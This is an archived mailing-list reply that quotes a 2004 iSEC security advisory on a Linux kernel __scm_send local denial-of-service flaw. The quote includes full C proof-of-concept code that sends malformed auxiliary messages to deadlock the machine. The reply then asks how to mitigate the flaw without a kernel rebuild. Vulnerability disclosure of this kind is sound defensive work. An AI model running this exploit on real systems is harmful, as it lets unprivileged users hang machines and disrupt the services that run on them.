[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <41BFAE2A.7040002@gmx.at>
From: Shadow333 at gmx.at (even multiplexed)
Subject: [VulnDiscuss] Re: Linux kernel scm_send local DoS
Paul Starzetz wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>
>Synopsis: Linux kernel scm_send local DoS
>Product: Linux kernel
>Version: 2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
>Vendor: http://www.kernel.org/
>URL: http://isec.pl/vulnerabilities/isec-0019-scm.txt
>CVE: CAN-2004-1016
>Author: Paul Starzetz <ihaquer@...c.pl>
>Date: Dec 14, 2004
>
>
>Issue:
>======
>
>A locally exploitable flaw has been found in the Linux socket layer,
>that allows a local user to hang a vulnerable machine.
>
>
>Details:
>========
>
>The Linux kernel provides a powerful socket API to user applications.
>Among other functions sockets provide an universal way for IPC and user-
>kernel communication. The socket layer uses several logical sublayers.
>One of the layers, so called auxiliary message layer (or scm layer),
>augments the socket API by an universal user-kernel message passing
>capability (see recvfrom(2) for more details on auxiliary messages).
>
>One of the scm message parsing functions invoked from the kernel
>sendmsg() code is __scm_send() and suffers from a deadlock condition if
>carefully prepared auxiliary message(s) is sent to a socket by an
>unprivileged application.
>
>We believe that the 2.4 kernel branch is not further exploitable. The
>2.6 branch has not been extensively checked, however it may be locally
>exploitable to gain elevated privileges due to its increased complexity.
>
>
>Discussion:
>=============
>
>See attached code.
>
>
>Impact:
>=======
>
>Unprivileged local users may hang a vulnerable Linux machine.
>
>
>Credits:
>========
>
>Paul Starzetz <ihaquer@...c.pl> has identified the vulnerability and
>performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF
>INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF
>ONE OF THE AUTHORS.
>
>
>Disclaimer:
>===========
>
>This document and all the information it contains are provided "as is",
>for educational purposes only, without warranty of any kind, whether
>express or implied.
>
>The authors reserve the right not to be responsible for the topicality,
>correctness, completeness or quality of the information provided in
>this document. Liability claims regarding damage caused by the use of
>any information provided, including any kind of information which is
>incomplete or incorrect, will therefore be rejected.
>
>
>Appendix:
>=========
>
>/*
> * Linux kernel 2.4 & 2.6 __scm_send DoS
> * Warning! this code will hang your machine
> *
> * gcc -O2 scmbang.c -o scmbang
> *
> * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
> *
> * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
> * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
> * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
> *
> */
>
>
>#define _GNU_SOURCE
>#include <stdio.h>
>#include <errno.h>
>#include <sys/socket.h>
>#include <arpa/inet.h>
>
>
>
>static char buf[1024];
>
>
>
>void
>fatal (const char *msg)
>{
> printf ("\n");
> if (!errno)
> {
> fprintf (stderr, "FATAL: %s\n", msg);
> }
> else
> {
> perror (msg);
> }
> printf ("\n");
> fflush (stdout);
> fflush (stderr);
> exit (1);
>}
>
>
>int
>main (void)
>{
> int s[2], r;
> struct sockaddr_in sin;
> struct msghdr *msg;
> struct cmsghdr *cmsg;
>
> r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
> if (r < 0)
> fatal ("socketpair");
>
> memset (buf, 0, sizeof (buf));
> msg = (void *) buf;
> msg->msg_control = (void *) (msg + 1);
>
>// make bad cmsgs
> cmsg = (void *) msg->msg_control;
>
> cmsg->cmsg_len = sizeof (*cmsg);
> cmsg->cmsg_level = 0xdeadbebe;
> cmsg->cmsg_type = 12; // len after overflow on second msg
> cmsg++;
>
>// -12 for deadlock
> cmsg->cmsg_len = -12;
> cmsg->cmsg_level = SOL_IP;
> msg->msg_controllen = (unsigned) (cmsg + 1) - (unsigned) msg->msg_control;
> r = sendmsg (s[0], msg, 0);
> if (r < 0)
> fatal ("sendmsg");
>
> printf ("\nYou lucky\n");
> fflush (stdout);
>
> return 0;
>}
>
>- --
>Paul Starzetz
>iSEC Security Research
>http://isec.pl/
>
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.0.7 (GNU/Linux)
>
>iD8DBQFBvsFeC+8U3Z5wpu4RAkcYAJ9ZANZb3Yt8LHIZHu4YTiKN+Htt3QCfZ0rH
>ZB8QMKmLVyKaQ5fvN/l8mL8=
>=2hQr
>-----END PGP SIGNATURE-----
>
>
>
>
>
Dear Ladies and Gentleman
First of all thanks to mir Starzetz for bringing this bug to our
attention.i just wanted to ask if anyone has a tip for me how to
quickfix this bug, without actually rebuilding a patched version of the
kernel.
id be thankful for every tip.
i hope theres actually a way to do that, cause our customers wouldnt
like that system of ours to reboot:/
greets
Oliver Leitner
Powered by blists - more mailing lists